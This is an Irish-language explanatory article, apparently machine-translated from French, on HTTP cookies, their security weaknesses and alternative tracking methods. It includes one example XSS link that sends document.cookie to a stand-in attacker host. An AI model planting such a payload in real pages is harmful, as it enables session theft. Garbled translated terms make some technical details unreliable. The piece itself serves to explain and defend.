Má úsáidtear níos mó ná brabhsálaí amháin ar ríomhaire, i ngach ceann acu tá aonad stórála ar leith le haghaidh fianáin i gcónaí. Mar sin ní aithníonn fianáin duine, ach an teaglaim de chuntas úsáideora, ríomhaire agus brabhsálaí gréasáin. Mar sin, is féidir le duine ar bith na cuntais, na ríomhairí nó na brabhsálaithe seo a bhfuil an iliomad fianáin acu a úsáid. Mar an gcéanna, ní dhéanann fianáin idirdhealú idir úsáideoirí iolracha a roinneann an cuntas úsáideora céanna, ríomhaire agus brabhsálaí, mar shampla i “caiféanna idirlín” nó áit ar bith a thugann rochtain shaor in aisce ar acmhainní ríomhaireachta.

Ach go praiticiúil tarlaíonn sé go bhfuil an ráiteas seo fallacious i bhformhór na gcásanna mar go n-úsáideann duine aonair go príomha ríomhaire “pearsanta” (nó fón cliste, nó táibléad, atá níos measa) go príomha. tríd an méid faisnéise a bhailítear teacht ar spriocdhíriú pearsanta fiú mura n-aithnítear an duine “is é sin”.

Goid fianáin

Is féidir le ríomhaire eile ar an líonra fianán a ghoid.

Le linn gnáthoibríochta, seoltar fianáin ar ais idir an freastalaí (nó grúpa freastalaithe san fhearann ​​céanna) agus brabhsálaí ríomhaire an úsáideora. Ós rud é gur féidir faisnéis íogair a bheith i bhfianáin (ainm úsáideora, pasfhocal a úsáidtear le haghaidh fíordheimhnithe, etc.), níor cheart go mbeadh a luachanna inrochtana ag ríomhairí eile. Is gníomh é goid fianán a dhéanann tríú páirtí neamhúdaraithe fianáin a idircheapadh.

Is féidir fianáin a ghoid trí sniffer paicéad in ionsaí ar a dtugtar fuadach seisiúin. Is féidir le ríomhairí seachas iad siúd a sheolann agus a fhaigheann (go háirithe ar an spás poiblí Wi-Fi neamhchriptithe) trácht ar an ngréasán a idircheapadh agus a léamh. Áiríonn an trácht seo fianáin a sheoltar thar sheisiúin ag baint úsáide as an ngnáthphrótacal HTTP. Nuair nach bhfuil trácht líonra criptithe, is féidir le húsáideoirí mailíseach cumarsáid úsáideoirí eile ar an líonra a léamh ag baint úsáide as "sniffers paicéad".

Is féidir an fhadhb seo a shárú tríd an nasc idir ríomhaire an úsáideora agus an freastalaí a chriptiú ag baint úsáide as prótacal HTTPS. Is féidir le freastalaí a bratach slán agus fianán á shocrú; ní sheolfaidh an brabhsálaí ach thar líne shlán, mar nasc SSL.

Mar sin féin, cuireann go leor suíomhanna, cé go n-úsáidtear cumarsáid chriptithe HTTPS le haghaidh fíordheimhnithe úsáideora (i.e. an leathanach logála isteach), fianáin seisiúin agus sonraí eile mar is gnách, trí naisc HTTP neamhchriptithe ar chúiseanna éifeachtúlachta. Mar sin is féidir le hionsaitheoirí fianáin úsáideoirí eile a thascradh agus iad a phearsanú ar shuíomhanna cuí nó iad a úsáid in ionsaithe fianán.

Scriptiú ar an suíomh: cuirtear fianán nár cheart a mhalartú ach idir an freastalaí agus an cliant chuig tríú páirtí eile.

Bealach eile le fianáin a ghoid is ea láithreáin a scriptiú agus iarraidh ar an mbrabhsálaí féin fianáin a sheoladh chuig freastalaithe mailíseacha nach bhfaigheann siad choíche. Ligeann brabhsálaithe nua-aimseartha codanna den chód a bhfuiltear ag lorg uathu a fhorghníomhú ón bhfreastalaí. Má fhaightear rochtain ar fhianáin le linn am rite, féadfar a luachanna a chur in iúl i bhfoirm éigin do fhreastalaithe nár cheart rochtain a fháil orthu. Má dhéantar fianáin a chriptiú sula seoltar thar an líonra iad, ní chuideoidh sé sin leis an ionsaí.

Is gnách go n-úsáideann ionsaitheoirí an cineál seo scriptithe ar an láthair ar shuímh a ligeann d'úsáideoirí ábhar HTML a phostáil. Trí chuid de chód comhoiriúnach a chomhtháthú sa ranníocaíocht HTML, is féidir le hionsaitheoir fianáin a fháil ó úsáideoirí eile. Is féidir eolas ar na fianáin seo a úsáid trí nascadh leis an suíomh céanna ag baint úsáide as na fianáin goidte, agus mar sin a bheith aitheanta mar an t-úsáideoir ar goideadh a fhianáin.

Bealach amháin chun ionsaithe den sórt sin a chosc ná bratach HttpOnly a úsáid; is rogha é, a tugadh isteach ó leagan 6 de Internet Explorer i PHP ó leagan 5.2.0 atá beartaithe chun an fianán a dhéanamh dorochtana don chliant gar don script. Mar sin féin, ba cheart d'fhorbróirí gréasáin é seo a chur san áireamh agus iad ag forbairt suímh ionas go mbeidh siad díolmhaithe ó scripteanna ar an láithreán.

Bagairt slándála eile a úsáidtear is ea monarú éilimh ar an suíomh.

Ceadaíonn an tsonraíocht theicniúil oifigiúil fianáin a sheoladh ar ais chuig freastalaithe san fhearann ​​ónar dtáinig siad amháin. Mar sin féin, is féidir luach na bhfianán a sheoladh chuig freastalaithe eile ag úsáid modhanna eile seachas ceanntásca fianán.

Go háirithe, ceadaítear go ginearálta do theangacha scriptithe cosúil le JavaScript rochtain a fháil ar luachanna fianán agus tá siad in ann luachanna treallach a sheoladh chuig aon fhreastalaí ar an Idirlíon. Úsáidtear an cumas scriptithe seo ó shuímh Ghréasáin a ligeann d'úsáideoirí ábhar HTML a phostáil ionas go bhféadfaidh úsáideoirí eile é a fheiceáil.

Mar shampla, d'fhéadfadh ionsaitheoir atá ag feidhmiú ar an bhfearann ​​​​example.com nóta tráchta a phostáil ina bhfuil an nasc seo a leanas ag cur in iúl do bhlag móréilimh nach bhfuil rialú aige ar shlí eile:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Nuair a chliceálann úsáideoir eile ar an nasc seo, feidhmíonn an brabhsálaí an chuid aitreabúide onclick den chód, mar sin cuireann sé liosta na bhfianán úsáideora atá gníomhach don leathanach seo in ionad teaghrán document.cookie. Mar sin, seoltar an liosta fianáin seo chuig an bhfreastalaí example.com, agus mar sin tá an t-ionsaitheoir in ann fianáin an úsáideora seo a bhailiú.

Is deacair an cineál seo ionsaí a bhrath ar thaobh an úsáideora toisc go dtagann an script ón bhfearann ​​​​céanna a shocraigh an fianán, agus is cosúil go bhfuil an oibríocht chun na luachanna a sheoladh údaraithe ag an bhfearann ​​​​sin. Meastar go bhfuil sé de fhreagracht ar na riarthóirí atá ag oibriú den chineál seo suímh srianta a chur i bhfeidhm a chuireann cosc ​​ar fhoilsiú cód mailíseach.

Ní bhíonn fianáin le feiceáil go díreach ag cláir ar thaobh an chliaint ar nós JavaScript dá seoltar iad leis an mbratach HttpOnly. Ó thaobh an fhreastalaí, is é an t-aon difríocht atá ann ná go gcuirtear réimse nua leis an gceanntásc Set-Fianán ina bhfuil an teaghrán HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Nuair a fhaigheann an brabhsálaí fianán den sórt sin, tá sé ceaptha é a úsáid de ghnáth sa mhalartú HTTP seo a leanas, ach gan é a dhéanamh le feiceáil ar scripteanna a fhorghníomhaítear ar thaobh an chliaint. Níl an bhratach HttpOnly mar chuid d’aon sonraíocht theicniúil oifigiúil, agus ní chuirtear i bhfeidhm í i ngach brabhsálaí. Tabhair faoi deara nach bhfuil aon bhealach ann faoi láthair chun cosc ​​a chur ar léamh agus scríobh fianáin seisiúin trí mhodh XMLHTTPRequest.

Mionathrú ar an ábhar: seolann ionsaitheoir fianán neamhbhailí chuig freastalaí, b'fhéidir déanta as fianán bailí a sheol an freastalaí.

Fianáin a athrú

A luaithe is gá na fianáin a stóráil agus a chur ar ais gan athrú chuig an bhfreastalaí, is féidir le hionsaitheoir luach na bhfianán a mhodhnú sula seoltar ar ais chuig an bhfreastalaí iad. Mar shampla, má tá an luach iomlán i bhfianán a chaithfidh an t-úsáideoir a íoc as na míreanna a chuirtear i gcairt siopadóireachta an tsiopa, má dhéantar an luach seo a athrú, beidh an freastalaí i mbaol an t-ionsaitheoir a ghearradh níos lú ná an praghas tosaigh. Tugtar an próiseas chun luach fianáin a mhodhnú nimhiú fianán agus is féidir é a úsáid tar éis goid fianán chun an t-ionsaí a dhéanamh leanúnach.

Sa mhodh sáraithe fianán, baineann an t-ionsaitheoir leas as glitch brabhsálaí chun fianán neamhbhailí a sheoladh chuig an bhfreastalaí.

Ní stórálann formhór na suíomhanna gréasáin, áfach, ach ID seisiúin — uimhir uathúil a ghintear go randamach a úsáidtear chun úsáideoir an tseisiúin a shainaithint — sa fhianán féin, agus stóráiltear an fhaisnéis eile ar fad ar an bhfreastalaí. Sa chás seo, déantar an fhadhb seo a réiteach den chuid is mó.

Láimhseáil fianán idir láithreáin ghréasáin

Táthar ag súil go mbeidh a fhianáin féin ag gach suíomh, mar sin níor cheart go mbeadh suíomh amháin in ann fianáin a bhaineann le láithreán eile a mhodhnú nó a chruthú. Is féidir le locht slándála brabhsálaí gréasáin ligean do shuíomhanna mailíseacha an riail seo a bhriseadh. Tugtar go coitianta ar shaothrú locht den sórt sin cócaireacht tras-suíomh. Is féidir gurb é cuspóir na n-ionsaithe sin ná goid aitheantais seisiúin.

Ba cheart d’úsáideoirí na leaganacha is déanaí de na brabhsálaithe gréasáin a úsáid ina gcuirtear deireadh beagnach leis na leochaileachtaí sin.

Staid coinbhleachta idir an cliant agus an freastalaí

Féadfaidh úsáid na bhfianán contrártha a chruthú idir staid an chliaint agus an stát atá stóráilte sa fhianán. Má fhaigheann an t-úsáideoir fianán agus má chliceálann sé ar an gcnaipe "Ar Ais" den bhrabhsálaí, go ginearálta ní bhíonn staid an bhrabhsálaí mar a bhí roimhe seo. Mar shampla, má chruthaítear ciseán siopa ar líne le fianáin, ní féidir inneachar an chiseáin a athrú nuair a fhilleann an t-úsáideoir ar stair an bhrabhsálaí: má bhrúnn an t-úsáideoir cnaipe chun alt a chur ina chiseán agus má chliceálann sé ar an " Return " cnaipe, fanann an t-alt sa cheann seo. B'fhéidir nach bhfuil sé seo ar intinn ag an úsáideoir, atá cinnte ag iarraidh a chur ar ceal an Chomh maith leis an alt. Féadfaidh neamhiontaofacht, mearbhall agus fabhtanna a bheith mar thoradh air seo. Mar sin ba chóir go mbeadh forbróirí gréasáin ar an eolas faoin gceist seo agus bearta a chur i bhfeidhm chun cásanna mar seo a láimhseáil.

Éaga fianán

Cháin saineolaithe slándála príobháideachta fianáin marthanacha as gan a bheith socraithe le dul in éag luath go leor, rud a ligeann do shuíomhanna gréasáin úsáideoirí a rianú agus a bpróifíl a thógáil le himeacht ama. Tá an ghné seo de fhianáin mar chuid den fhadhb fuadaithe seisiúin freisin, mar is féidir fianán marthanach goidte a úsáid chun aithris a dhéanamh ar úsáideoir ar feadh tréimhse fada ama.

Le léamh freisin: GAFAM: cé hiad? Cén fáth a bhfuil siad (uaireanta) chomh scanrúil?

Roghanna eile seachas fianáin

Is féidir roinnt oibríochtaí is féidir a dhéanamh ag baint úsáide as fianáin a dhéanamh freisin trí úsáid a bhaint as meicníochtaí eile a sheachnaíonn fianáin nó a athchruthaíonn fianáin scriosta, rud a chruthaíonn saincheisteanna príobháideachais ar an mbealach céanna (nó uaireanta níos measa mar nach bhfuil siad le feiceáil) ná fianáin.

Seoladh IP

Is féidir le húsáideoirí a rianú le seoladh IP an ríomhaire ag glaoch ar an leathanach. Tá an teicníocht seo ar fáil ó tugadh isteach an Gréasán Domhanda, agus leathanaigh á n-íoslódáil iarrann an freastalaí seoladh IP an ríomhaire atá ag rith an bhrabhsálaí nó an seachfhreastalaí, mura n-úsáidtear aon cheann. Is féidir leis an bhfreastalaí an fhaisnéis seo a rianú cibé an bhfuil fianáin in úsáid nó nach bhfuil. Mar sin féin, ní bhíonn na seoltaí seo chomh hiontaofa go hiondúil maidir le húsáideoir a shainaithint ná le fianáin toisc go bhféadfadh iliomad úsáideoirí ríomhairí agus seachvótálaithe a roinnt, agus féadfaidh an ríomhaire céanna seoladh IP difriúil a fháil ar gach seisiún oibre (mar shampla c go minic a bhíonn i gcás naisc ghutháin) .

Is féidir le rianú seoltaí IP a bheith iontaofa i gcásanna áirithe, mar naisc leathanbhanda a choimeádann an seoladh IP céanna ar feadh i bhfad, chomh fada agus a bhíonn an chumhacht ar siúl.

Tá roinnt córas cosúil le Tor deartha chun anaithnideacht an Idirlín a choinneáil agus chun rianú seoltaí IP a dhéanamh dodhéanta nó neamhphraiticiúil.

URL

Tá teicníc níos cruinne bunaithe ar fhaisnéis a leabú i URLanna. Teicníc amháin is ea an chuid teaghrán ceiste den URL a úsáidtear go hiondúil chun na críche seo, ach is féidir páirteanna eile a úsáid freisin. Úsáideann an freastalaí Java agus na meicníochtaí seisiúin PHP an modh seo mura bhfuil fianáin cumasaithe.

Baineann an modh seo leis an bhfreastalaí gréasáin iarratais teaghrán a chur i gceangal leis na naisc den leathanach gréasáin a iompraíonn é nuair a sheoltar chuig an mbrabhsálaí é. Nuair a leanann an t-úsáideoir nasc, filleann an brabhsálaí an teaghrán ceisteanna ceangailte chuig an bhfreastalaí.

Tá cosúlachtaí idir na teaghráin iarratais a úsáidtear chun na críche seo agus na fianáin, agus faisnéis á roghnú go treallach ag an bhfreastalaí agus á cur ar ais ag an mbrabhsálaí iad araon. Mar sin féin, tá roinnt difríochtaí ann: nuair a athúsáidtear URL ina bhfuil teaghrán iarratais, seoltar an fhaisnéis chéanna chuig an bhfreastalaí. Mar shampla, má tá sainroghanna úsáideora ionchódaithe i teaghrán ceiste de URL agus má sheolann an t-úsáideoir an URL sin chuig úsáideoir eile trí ríomhphost, beidh an t-úsáideoir sin in ann na sainroghanna sin a úsáid freisin.

Ar an láimh eile, nuair a fhaigheann úsáideoir rochtain ar an leathanach céanna faoi dhó, níl aon ráthaíocht go n-úsáidfear an teaghrán ceiste céanna an dá uair. Mar shampla, má thuirlingíonn úsáideoir ar leathanach ó leathanach inmheánach an tsuímh den chéad uair agus má thuirlingíonn sé ar an leathanach céanna ó leathanach seachtrach an dara huair, is gnách go mbíonn teaghrán na gceisteanna i gcoibhneas le leathanach an tsuímh difriúil, agus is ionann na fianáin. .

Baineann míbhuntáistí eile a bhaineann le teaghráin fiosrúcháin le slándáil: trí shonraí a aithníonn seisiún i teaghráin fiosrúcháin a chumasú nó a shimpliú ionsaithe socraithe seisiúin, ionsaithe tagartha aitheantóra, agus saothrú eile. Tá sé níos sláine aitheantais seisiúin a chur ar aghaidh mar fhianáin HTTP.

Réimse foirm i bhfolach

Foirm amháin de rianú seisiúin, a úsáideann ASP.NET, is ea foirmeacha gréasáin a úsáid le réimsí ceilte. Tá an teicníocht seo an-chosúil le teaghráin iarratais URL a úsáid chun faisnéis a iompar agus tá na buntáistí agus na míbhuntáistí céanna aige; agus má dhéantar an fhoirm a phróiseáil leis an modh HTTP GET, is cuid de URL an bhrabhsálaí a seolfaidh na réimsí nuair a bheidh an fhoirm á cur isteach. Ach déantar an chuid is mó de na foirmeacha a phróiseáil le HTTP POST, rud a fhágann gur féidir faisnéis na bhfoirme, lena n-áirítear réimsí i bhfolach, a chur leis mar ionchur breise nach cuid den URL ná fianán é.

Tá dhá bhuntáiste ag an gcur chuige seo ó thaobh rianaithe de: ar dtús, trí rianú a dhéanamh ar an bhfaisnéis a chuirtear sa chód foinse HTML agus ionchur POST seachas an URL ligfidh an meán-úsáideoir an rianú seo a sheachaint; sa dara háit, ní dhéantar an fhaisnéis seisiúin a chóipeáil nuair a dhéanann an t-úsáideoir an URL a chóipeáil (chun an leathanach a shábháil ar diosca nó é a sheoladh trí ríomhphost, mar shampla).

fuinneoige.ainm

Is féidir le gach gnáthbhrabhsálaí gréasáin cuid mhór sonraí a stóráil (2MB go 32MB) trí JavaScript ag baint úsáide as an airí window.name de chuid an DOM. Is féidir na sonraí seo a úsáid in ionad fianáin seisiúin agus úsáidtear iad freisin thar fearann. Is féidir an teicníc a chúpláil le réada JSON chun tacar casta d’athróga seisiúin ar thaobh an chliaint a stóráil.

Is é an buntáiste a bhaineann leis ná go mbeidh window.name folamh ag gach fuinneog nó cluaisín ar leith ar dtús; agus iad ag brabhsáil le cluaisíní (arna oscailt ag an úsáideoir) ciallaíonn sé seo nach mbeidh ainm fuinneoige ar na cluaisíní a osclaítear ina n-aonar. Ina theannta sin is féidir window.name a úsáid chun cuairteoirí a rianú thar láithreáin éagsúla ar féidir leo a bheith ina n-údar imní maidir le príobháideacht.

Ar bhealaí áirithe is féidir leis seo a bheith níos sláine ná fianáin, mar gheall ar neamh-rannpháirtíocht an fhreastalaí, rud a fhágann go bhfuil sé dosháraithe i leith ionsaí líonra na bhfianán sniffer. Mar sin féin, má ghlactar bearta speisialta chun na sonraí a chosaint, tá sé leochaileach d'ionsaithe breise, toisc go bhfuil na sonraí ar fáil trí shuímh eile a osclaíodh san fhuinneog chéanna.

Fíordheimhniú HTTP

Áirítear sa phrótacal HTTP na prótacail fíordheimhnithe rochtana bunúsacha agus an díolaim fíordheimhnithe rochtana, a cheadaíonn rochtain ar leathanach gréasáin ach amháin nuair a bhíonn an t-ainm úsáideora agus an pasfhocal tugtha ag an úsáideoir. Má iarrann an freastalaí deimhniú chun rochtain a dheonú ar leathanach gréasáin, iarrann an brabhsálaí ón úsáideoir é agus nuair a fhaightear é, déanann an brabhsálaí é a stóráil agus a sheoladh i ngach iarratas HTTP ina dhiaidh sin. Is féidir an fhaisnéis seo a úsáid chun an t-úsáideoir a rianú.

Réad roinnte áitiúil

Má chuimsíonn brabhsálaí an breiseán Adobe Flash Player, beidh an réada comhroinnte áitiúla is féidir é a úsáid chun na críche céanna le fianáin. Is féidir leo a bheith ina rogha tarraingteach d’fhorbróirí gréasáin mar:

• is é 100 KB an teorainn mhéid réamhshocraithe do réad comhroinnte áitiúil;
• tá seiceálacha slándála ar leithligh ó sheiceálacha fianán úsáideoirí (mar sin is féidir réada comhroinnte áitiúla a cheadú nuair nach bhfuil fianáin).

Is é an pointe deireanach seo, a dhéanann idirdhealú idir an beartas bainistíochta fianán agus beartas comhroinnte áitiúil Adobe ardaíonn sé ceisteanna maidir le bainistiú a shocruithe príobháideachais ag an úsáideoir: caithfidh sé a bheith ar an eolas nach mbíonn tionchar ar bith ag an mbainistíocht atá aige ar fhianáin ar bhainistíocht na n-ábhar comhroinnte áitiúil, agus vice versa.

Cáineadh eile ar an gcóras seo ná nach féidir é a úsáid ach tríd an breiseán Adobe Flash Player atá dílsithe agus nach caighdeán gréasáin é.

Marthanacht taobh an chliaint

Tacaíonn roinnt brabhsálaithe gréasáin le meicníocht sheasmhachta script-bhunaithe, a ligeann don leathanach faisnéis a stóráil go háitiúil le húsáid níos déanaí. Tacaíonn Internet Explorer, mar shampla, le faisnéis leanúnach i stair an bhrabhsálaí, i leabharmharcanna, i bhformáid atá stóráilte in XML, nó go díreach le leathanach gréasáin a shábháiltear ar diosca. Do Microsoft Internet Explorer 5, tá modh sonraí úsáideora ar fáil trí iompraíochtaí DHTML.

Thug an W3C isteach in HTML 5 API JavaScript nua do stóráil sonraí ar thaobh na gcliant ar a dtugtar stóráil Gréasáin agus bhí sé mar aidhm aige fianáin a athsholáthar go buan. Tá sé cosúil le fianáin ach le cumas feabhsaithe go mór agus gan faisnéis a stóráil i gceanntásc na n-iarratas HTTP. Ceadaíonn an API dhá chineál stórála gréasáin: stóráil logánta agus stóráil seisiún, cosúil le fianáin leanúnacha agus fianáin seisiúin (ach amháin go dtéann fianáin seisiúin in éag nuair a dhúntar an brabhsálaí agus seisiún stórála in éag nuair a bhíonn an cluaisín dúnta), faoi seach. Tacaíonn Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 agus Opera 10.50 le stóráil gréasáin.

Braitheann meicníocht dhifriúil de ghnáth ar thaisce brabhsálaí (i gcuimhne seachas athnuachan) ag baint úsáide as cláir JavaScript ar leathanaigh ghréasáin. 

Mar shampla, is féidir an chlib a bheith ar leathanach . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Ag an bpointe seo, fanann an clár i gcuimhne taisce agus ní athlódáiltear an leathanach ar tugadh cuairt air an dara huair. Dá bhrí sin, má tá athróg dhomhanda sa ríomhchlár (mar shampla var id = 3243242;), fanann an t-aitheantóir seo bailí agus is féidir é a shaothrú trí chód JavaScript eile a luaithe a luchtaítear an leathanach arís, nó nuair a bhíonn leathanach a nascann an ríomhchlár luchtaithe. 

Is é an míbhuntáiste mór a bhaineann leis an modh seo ná go gcaithfidh an athróg dhomhanda JavaScript a bheith statach, rud a chiallaíonn nach féidir é a athrú nó a scriosadh mar fhianán.

méarloirg brabhsálaí gréasáin

Is éard is méarloirg brabhsálaí ann faisnéis a bhailítear faoi shocruithe cumraíochta brabhsálaí chun críocha aitheantais. Is féidir na méarloirg seo a úsáid chun úsáideoir Idirlín nó gléas a shainaithint go hiomlán nó go páirteach fiú nuair atá fianáin díchumasaithe.

Tá faisnéis bhunúsach cumraíochta brabhsálaí gréasáin bailithe le fada ag seirbhísí lucht féachana an láithreáin ghréasáin chun trácht gréasáin daonna a thomhas go cruinn agus chun cineálacha éagsúla calaoise cliceáil a bhrath. Le cabhair ó theangacha scriptithe cliant-taobh, tá bailiú faisnéise i bhfad níos cruinne anois is féidir.

Má dhéantar an fhaisnéis seo a thiontú ina giotán teaghrán, cruthaítear méarloirg an ghléis. In 2010, thomhais an Electronic Frontier Foundation (EFF) eantrópacht mhéarloirg an bhrabhsálaí mar ar a laghad Giotán 18,1, agus sin sular chuir dul chun cinn i méarlorgaireacht chanbhás 5,7 giotán leis an eantrópacht sin.

Fianáin i mbeagán focal

Is comhaid bheaga téacs iad fianáin a stórálann an brabhsálaí gréasáin ar thiomántán crua cuairteora láithreáin ghréasáin agus a úsáidtear (i measc rudaí eile) chun faisnéis a thaifeadadh faoin gcuairteoir nó faoina dturas tríd an suíomh. Mar sin is féidir leis an stiúrthóir gréasáin nósanna cuairteora a aithint agus cur i láthair a shuíomh a phearsanú do gach cuairteoir; Fágann fianáin gur féidir cuimhneamh ar cé mhéad alt atá le taispeáint ar an leathanach baile nó fiú na dintiúir logáil isteach a choinneáil d’aon pháirtí príobháideach: nuair a fhilleann an cuairteoir ar an suíomh, ní gá dó a ainm agus a phasfhocal a chlóscríobh a thuilleadh. a aithint, ós rud é go léitear go huathoibríoch iad sa bhfianán.

Tá saolré teoranta ag fianán, arna shocrú ag dearthóir an tsuímh. Is féidir leo dul in éag freisin ag deireadh an tseisiúin ar an suíomh, a fhreagraíonn do dhúnadh an bhrabhsálaí. Úsáidtear fianáin go forleathan chun an saol a éascú do chuairteoirí agus chun faisnéis níos ábhartha a chur i láthair dóibh. Ach fágann teicnící speisialta gur féidir cuairteoir a leanúint ar roinnt suíomhanna agus dá bhrí sin faisnéis an-fhairsing ar a nósanna a bhailiú agus a chros-seiceáil. Thug an modh seo cáil ar úsáid na bhfianán mar theicníc faireachais a sháraíonn príobháideacht na gcuairteoirí, rud a fhreagraíonn ar an drochuair don réaltacht i go leor cásanna úsáide ar chúiseanna neamhtheicniúla nó nach bhfuil meas ar ionchais úsáideoirí.

Mar fhreagra ar na himní dlisteanacha seo, tugann HTML 5 isteach API JavaScript nua do stóráil sonraí ar thaobh an chliaint ar a dtugtar stóráil Gréasáin, atá i bhfad níos sláine agus le cumas níos mó, a bhfuil sé mar aidhm aige fianáin a athsholáthar.

Stóráil fianáin

Le roinnt brabhsálaithe, is furasta fianán a chur in eagar, is leor eagarthóir téacs simplí cosúil le Notepad chun a luachanna a athrú de láimh.

Déantar fianáin a shábháil ar bhealach difriúil ag brath ar an mbrabhsálaí:

• Microsoft Internet Explorer sábhálann sé gach fianán i gcomhad difriúil;
• Mozilla Firefox sábhálann sé a chuid fianáin go léir in aon chomhad amháin;
• oibriú sábhálann sé a chuid fianáin go léir i gcomhad amháin agus criptíonn sé iad (ní féidir iad a mhodhnú ach amháin sna roghanna bogearraí);
• Apple Safari sábhálann sé a chuid fianán go léir i gcomhad síneadh .plist amháin. Is féidir modhnú ach níl sé an-éasca, mura dtéann tú trí na roghanna bogearraí.

Tá brabhsálaithe ag teastáil chun tacaíocht a thabhairt a laghad :

• 300 fianán comhuaineach;
• 4 o an fianán;
• 20 fianán in aghaidh an óstaigh nó an fhearainn.